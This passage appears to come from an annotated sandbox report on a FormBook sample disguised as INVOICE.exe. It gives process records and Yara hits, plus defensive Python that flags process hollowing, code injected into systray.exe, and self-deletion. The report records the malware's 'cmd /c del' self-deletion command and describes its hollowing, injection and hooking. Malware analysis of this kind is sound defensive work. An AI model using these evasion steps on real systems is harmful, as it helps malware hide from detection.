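    return detect_inline_hooks(clean, live, {})        # the report gives no addresses


if __name__ == "__main__":
    for f in report_findings():
        print(f"{f.function}: {f.kind}, {f.patched_len} bytes patched, target={f.target}")
```

The six bytes the report shows (`48 8B B8 ...`, the start of a `mov rdi, [rax+disp32]`) match none of the textbook jump stubs, so a scanner that only looks for `E9`/`FF 25` at export entry points would miss them; the byte diff flags all four regardless, which is why the comparison against a clean copy, not the opcode pattern, is the detection. The report truncates the patch at six bytes, so the full stub length is not known from the page.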

Behavior

System Behavior

General

Start time: 11:37:03
Start date: 11/06/2021
Path: C:\Users\user\Desktop\INVOICE.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\INVOICE.exe'
Imagebase: 0x400000
File size: 246224 bytes
MD5 hash: 98901AFF995D92677CF637B241AE9A9B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 11:37:04
Start date: 11/06/2021
Path: C:\Users\user\Desktop\INVOICE.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\INVOICE.exe'
Imagebase: 0x400000
File size: 246224 bytes
MD5 hash: 98901AFF995D92677CF637B241AE9A9B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 11:37:08
Start date: 11/06/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:37:39
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\systray.exe
Imagebase: 0xc50000
File size: 9728 bytes
MD5 hash: 1373D481BE4C8A6E5F5030D2FB0A0C68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 11:37:41
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\INVOICE.exe'
Imagebase: 0x10b0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:37:42
Start date: 11/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
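The process records above, read together, carry the evidence for three of the summary's signatures: the second INVOICE.exe (started one second after the first, same path and image base) has FormBook Yara hits on executable memory at its own image base 0x400000, which is what a hollowed image looks like; systray.exe, a Windows binary, has hits on executable regions that are not its image; and cmd.exe is launched only to `del` the sample. The following is an added example, not code from the report or from Joe Sandbox, that encodes those records and applies the three checks mechanically. It assumes the memory-dump ("Source") names have the form `<process>.<phase>.<id>.<base>.<protection>.<type>.sdmp` with `<protection>` a Win32 page-protection constant (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE); that field decoding, the `Proc` labels such as `INVOICE.exe#1`, and the finding names are this example's own.

```python
"""Triage the report's process list for hollowing, injection and self-deletion.

Added example, not part of the sandbox report. Checks applied:
  1. Yara hit on executable memory at a process's own image base -> process hollowing;
  2. Yara hit on executable memory, not the image, inside a Windows binary -> injected code;
  3. cmd.exe /c del <path of another process in the tree> -> self-deletion.
Assumption: the sdmp name's fifth field is the Win32 page-protection constant.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

PAGE_EXECUTE = {0x10, 0x20, 0x40, 0x80}     # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
SYSTEM_DIRS = ("c:\\windows\\",)            # trusted host binaries live under here


@dataclass
class Proc:
    label: str          # this example's label; the report only gives path and start time
    path: str
    imagebase: int
    cmdline: str
    yara_sources: List[str] = field(default_factory=list)


SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<phase>[0-9a-f]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<type>[0-9a-f]{8})\.sdmp$", re.I)
DEL_RE = re.compile(r"/c\s+del\s+'?(?P<victim>.+?)'?\s*$", re.I)


def parse_sdmp(name: str) -> dict:
    """Split a memory-dump name into numeric fields (hex except the decimal id)."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"unexpected sdmp name: {name}")
    d = {k: int(v, 16) for k, v in m.groupdict().items() if k != "id"}
    d["id"] = int(m["id"])
    return d


def triage(procs: List[Proc]) -> List[Tuple[str, str, Optional[int]]]:
    """Return (process label, finding, region base) tuples, deduplicated and sorted."""
    out = set()
    for p in procs:
        for src in p.yara_sources:
            d = parse_sdmp(src)
            base, executable = d["base"], d["protect"] in PAGE_EXECUTE
            if not executable:
                out.add((p.label, "nonexec_payload", base))     # unpacked data/config in RW memory
            elif base == p.imagebase:
                out.add((p.label, "process_hollowing", base))   # own image replaced with malware code
            elif p.path.lower().startswith(SYSTEM_DIRS):
                out.add((p.label, "injected_code", base))       # executable malware in a Windows binary
            else:
                out.add((p.label, "rwx_payload", base))         # unpacked stage in the sample's own memory
        m = DEL_RE.search(p.cmdline)
        others = {q.path.lower() for q in procs if q is not p}
        if m and m["victim"].lower() in others:
            out.add((p.label, "self_deletion", None))
    return sorted(out, key=lambda f: (f[0], f[1], f[2] or 0))


# Records transcribed from the report's "System Behavior" section.
REPORT_PROCS = [
    Proc("INVOICE.exe#0", r"C:\Users\user\Desktop\INVOICE.exe", 0x400000, r"'C:\Users\user\Desktop\INVOICE.exe'",
         ["00000000.00000002.204139591.0000000009990000.00000004.00000001.sdmp"]),
    Proc("INVOICE.exe#1", r"C:\Users\user\Desktop\INVOICE.exe", 0x400000, r"'C:\Users\user\Desktop\INVOICE.exe'",
         ["00000001.00000001.201178753.0000000000400000.00000040.00020000.sdmp",
          "00000001.00000002.275287960.00000000006F0000.00000040.00000001.sdmp",
          "00000001.00000002.274983977.0000000000590000.00000040.00000001.sdmp",
          "00000001.00000002.273615422.0000000000400000.00000040.00000001.sdmp"]),
    Proc("explorer.exe", r"C:\Windows\explorer.exe", 0x7ff714890000, ""),
    Proc("systray.exe#8", r"C:\Windows\SysWOW64\systray.exe", 0xc50000, r"C:\Windows\SysWOW64\systray.exe",
         ["00000008.00000002.461491283.0000000000A50000.00000004.00000001.sdmp",
          "00000008.00000002.460557300.00000000005B0000.00000040.00000001.sdmp",
          "00000008.00000002.461394658.0000000000A20000.00000040.00000001.sdmp"]),
    Proc("cmd.exe", r"C:\Windows\SysWOW64\cmd.exe", 0x10b0000, r"/c del 'C:\Users\user\Desktop\INVOICE.exe'"),
    Proc("conhost.exe", r"C:\Windows\System32\conhost.exe", 0x7ff6b2800000,
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for label, kind, base in triage(REPORT_PROCS):
        print(f"{label:15} {kind:18} {'' if base is None else hex(base)}")
```

Run on the report's records this yields one `process_hollowing` finding for the second INVOICE.exe at 0x400000, two `injected_code` findings for systray.exe (0x5B0000 and 0xA20000), the `self_deletion` finding for cmd.exe, and nothing for explorer.exe or conhost.exe. Note that explorer.exe is clean by this test even though the hook table shows it was tampered with: the inline hooks live in user32.dll's mapped image, not in a separately dumped region, so prolog diffing (not Yara on memory dumps) is the check that covers it.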
